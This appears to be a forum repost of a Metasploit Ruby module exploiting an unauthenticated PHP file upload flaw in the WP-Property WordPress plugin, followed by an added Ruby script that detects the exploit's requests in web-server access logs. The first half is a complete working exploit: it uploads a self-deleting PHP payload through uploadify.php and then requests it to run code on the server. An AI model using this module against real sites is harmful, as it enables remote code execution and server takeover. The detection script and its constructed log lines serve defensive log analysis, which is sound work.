WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Version check: the module only verifies that the uploadify.php handler is reachable.
  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body: the "Filedata" part carries the file, "folder" the destination directory.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # uploadify.php answers with the path of the stored file; anything else is treated as failure.
    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
Don't ask me what this is or how to use it; I mean msf.
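The module above leaves a recognisable trace in web-server access logs: a GET to uploadify.php from check(), a POST to the same handler that stores the file, then a GET of a freshly named .php file from the same uploadify directory. As an added example that is not part of the forum post or of the Metasploit module, the Ruby script below picks that sequence out of combined-format access logs and separates full exploitation (upload followed by execution from one client) from a scanner that only probed the endpoint. It assumes the Apache/nginx "combined" log format and the plugin's default path under wp-content/plugins/wp-property; the log lines are constructed for the example.

```ruby
# Added example: detect the uploadify.php upload-then-execute sequence in access logs.
# Not part of the forum post or the Metasploit module. Assumes Apache/nginx "combined"
# log format and the plugin's default path under wp-content/plugins/wp-property.

PLUGIN_DIR = '/wp-content/plugins/wp-property/third-party/uploadify/'
# The endpoint the module's check() probes and exploit() posts to.
UPLOADIFY = Regexp.new(Regexp.escape(PLUGIN_DIR) + 'uploadify\.php')
# Any other .php file served from that directory: a dropped file being fetched.
DROPPED_PHP = Regexp.new(Regexp.escape(PLUGIN_DIR) + '(?!uploadify\.php)[^/?\s]+\.php')

# Minimal combined-log parser: client IP, timestamp, method, path, status code.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], ts: m[:ts], method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Classify one request: :probe (GET uploadify.php, what the module's check does),
# :upload (POST uploadify.php), :execute (GET of another .php file in that directory).
def classify(entry)
  return :probe   if entry[:method] == 'GET'  && entry[:path] =~ UPLOADIFY
  return :upload  if entry[:method] == 'POST' && entry[:path] =~ UPLOADIFY
  return :execute if entry[:method] == 'GET'  && entry[:path] =~ DROPPED_PHP
  nil
end

# Returns findings as hashes {ip:, ts:, method:, path:, status:, reason:}.
def scan_log(lines)
  lines.map { |line|
    entry = parse_line(line)
    next nil unless entry
    reason = classify(entry)
    reason ? entry.merge(reason: reason) : nil
  }.compact
end

# Client IPs that show the full sequence (upload and execute), which separates
# actual exploitation from a scanner that only requested the endpoint.
def confirmed_exploitation(findings)
  findings.group_by { |f| f[:ip] }.select { |_ip, fs|
    reasons = fs.map { |f| f[:reason] }
    reasons.include?(:upload) && reasons.include?(:execute)
  }.keys
end

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
  '203.0.113.7 - - [04/Jan/2013:19:51:30 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [04/Jan/2013:19:51:31 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 95 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [04/Jan/2013:19:51:32 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/XyZab.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [04/Jan/2013:19:52:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [04/Jan/2013:19:53:00 +0800] "GET /wordpress/wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"'
]

if __FILE__ == $0
  scan_log(SAMPLE_LOG).each { |f| puts "#{f[:ts]} #{f[:ip]} #{f[:reason]} #{f[:path]}" }
  puts "confirmed: #{confirmed_exploitation(scan_log(SAMPLE_LOG)).join(', ')}"
end
```

Run it against a real log with `scan_log(File.readlines('access.log'))`; the three reasons map to the three requests the module issues, and only an IP that produces both :upload and :execute is reported by confirmed_exploitation. A site that has removed or blocked the uploadify handler will still see :probe entries from scanners, which is why the probe alone is not treated as a compromise.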